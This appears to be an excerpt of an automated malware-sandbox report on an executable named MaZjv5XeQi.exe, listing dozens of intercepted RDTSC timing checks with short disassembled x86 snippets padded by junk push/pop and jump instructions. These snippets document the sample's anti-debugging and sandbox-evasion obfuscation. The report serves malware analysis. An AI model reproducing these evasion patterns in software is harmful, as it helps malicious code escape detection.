                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD57BC second address: BD57CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007FEB1C7EA9D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD64E1 second address: BD64E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6A52 second address: BD6A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6A70 second address: BD6A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6A76 second address: BD6A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEB1C7EA9DCh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6A87 second address: BD6ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEB1CC19F7Dh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FEB1CC19F84h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jne 00007FEB1CC19F86h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6ABB second address: BD6AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC68D second address: BDC693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC693 second address: BDC697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDB344 second address: BDB35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEB1CC19F82h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDB35E second address: BDB39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9E1h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEB1C7EA9E8h 0x00000011 jmp 00007FEB1C7EA9DEh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDB4F9 second address: BDB4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDB8EF second address: BDB91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007FEB1C7EA9E1h 0x0000000c jmp 00007FEB1C7EA9DEh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDBBD9 second address: BDBBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FEB1CC19F7Eh 0x0000000c jno 00007FEB1CC19F76h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDBBF3 second address: BDBC4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E7h 0x00000007 ja 00007FEB1C7EA9D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FEB1C7EA9E4h 0x00000017 jmp 00007FEB1C7EA9E9h 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jnl 00007FEB1C7EA9D6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDBEF3 second address: BDBEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDBEF7 second address: BDBF04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC024 second address: BDC036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Ch 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC036 second address: BDC03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC03E second address: BDC042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC042 second address: BDC046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC046 second address: BDC05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FEB1CC19F82h 0x0000000c jl 00007FEB1CC19F76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B891B1 second address: B891B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B891B7 second address: B891CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1CC19F7Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC4EB second address: BDC4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEB1C7EA9D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC4FA second address: BDC4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC4FE second address: BDC50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEB1C7EA9D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC50E second address: BDC514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDAE54 second address: BDAE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEB1C7EA9D6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE00D2 second address: BE00F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEB1CC19F86h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE00F9 second address: BE011F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007FEB1C7EA9D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007FEB1C7EA9EDh 0x00000013 jmp 00007FEB1C7EA9E1h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA7530 second address: BA755B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEB1CC19F78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2284h] 0x00000013 lea eax, dword ptr [ebp+124822C2h] 0x00000019 sub dword ptr [ebp+122D310Fh], esi 0x0000001f nop 0x00000020 push esi 0x00000021 push esi 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 pushad 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA755B second address: BA757A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEB1C7EA9E8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA757A second address: B885AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FEB1CC19F78h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 call 00007FEB1CC19F86h 0x00000027 adc di, A3C1h 0x0000002c pop edi 0x0000002d call dword ptr [ebp+124484DEh] 0x00000033 jbe 00007FEB1CC19F90h 0x00000039 pushad 0x0000003a jmp 00007FEB1CC19F85h 0x0000003f push edi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA7993 second address: 9F88B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEB1C7EA9E4h 0x0000000f nop 0x00000010 jmp 00007FEB1C7EA9E0h 0x00000015 push dword ptr [ebp+122D1251h] 0x0000001b mov dx, 81BBh 0x0000001f call dword ptr [ebp+122D2844h] 0x00000025 pushad 0x00000026 stc 0x00000027 xor eax, eax 0x00000029 pushad 0x0000002a movzx edx, cx 0x0000002d mov ebx, 26BB5576h 0x00000032 popad 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 mov dword ptr [ebp+122D3035h], edi 0x0000003d mov dword ptr [ebp+122D36C8h], eax 0x00000043 stc 0x00000044 jmp 00007FEB1C7EA9DCh 0x00000049 mov esi, 0000003Ch 0x0000004e jmp 00007FEB1C7EA9E7h 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 jmp 00007FEB1C7EA9DFh 0x0000005c lodsw 0x0000005e xor dword ptr [ebp+122D3035h], ebx 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007FEB1C7EA9E2h 0x0000006d jmp 00007FEB1C7EA9E9h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 or dword ptr [ebp+122D3035h], edi 0x0000007c push eax 0x0000007d jo 00007FEB1C7EA9E2h 0x00000083 jbe 00007FEB1C7EA9DCh 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA7EFF second address: BA7F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA8411 second address: BA841F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA841F second address: BA8423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA87D4 second address: BA87E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA87E1 second address: BA87E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE03E5 second address: BE0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9DAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c jc 00007FEB1C7EA9DEh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE0C9D second address: BE0CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE0CA3 second address: BE0CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE0CA9 second address: BE0CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE0E13 second address: BE0E1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE67FC second address: BE6841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEB1CC19F7Ch 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FEB1CC19F7Fh 0x00000013 popad 0x00000014 jl 00007FEB1CC19F95h 0x0000001a jng 00007FEB1CC19F87h 0x00000020 jmp 00007FEB1CC19F81h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE638F second address: BE6394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE6394 second address: BE63AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEB1CC19F86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE9309 second address: BE930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BEAF86 second address: BEAF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF25F0 second address: BF2608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF2608 second address: BF2626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEB1CC19F89h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF2A11 second address: BF2A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF2A19 second address: BF2A4C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FEB1CC19F7Fh 0x0000000c jmp 00007FEB1CC19F81h 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FEB1CC19F76h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF6D66 second address: BF6D91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEB1C7EA9DDh 0x00000008 jo 00007FEB1C7EA9D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FEB1C7EA9D8h 0x00000019 pushad 0x0000001a popad 0x0000001b jp 00007FEB1C7EA9D8h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF6D91 second address: BF6D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF6D97 second address: BF6DC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DEh 0x00000007 jmp 00007FEB1C7EA9E5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF672C second address: BF6730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF6730 second address: BF6734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF69CE second address: BF69DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FEB1CC19F7Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF69DE second address: BF69E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF69E3 second address: BF69ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFADD8 second address: BFADEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEB1C7EA9DBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFA45B second address: BFA496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FEB1CC19F7Eh 0x0000000a jg 00007FEB1CC19F82h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007FEB1CC19F80h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFA64E second address: BFA66F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FEB1C7EA9DAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jnp 00007FEB1C7EA9D6h 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFA66F second address: BFA679 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEB1CC19F7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFA7AD second address: BFA7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C01336 second address: C0133C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0133C second address: C01342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C01342 second address: C0134C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEB1CC19F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0134C second address: C01350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C02089 second address: C0208D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0208D second address: C02095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0265A second address: C0266F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FEB1CC19F7Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0630E second address: C06316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C06316 second address: C06320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEB1CC19F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C06320 second address: C0632F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C064B2 second address: C064BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FEB1CC19F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C064BE second address: C064DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FEB1C7EA9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C064DB second address: C064F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEB1CC19F87h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C067EC second address: C067F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0B9A9 second address: C0B9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C11A09 second address: C11A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C11E2A second address: C11E2F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12405 second address: C12419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FEB1C7EA9DAh 0x0000000f rdtsc
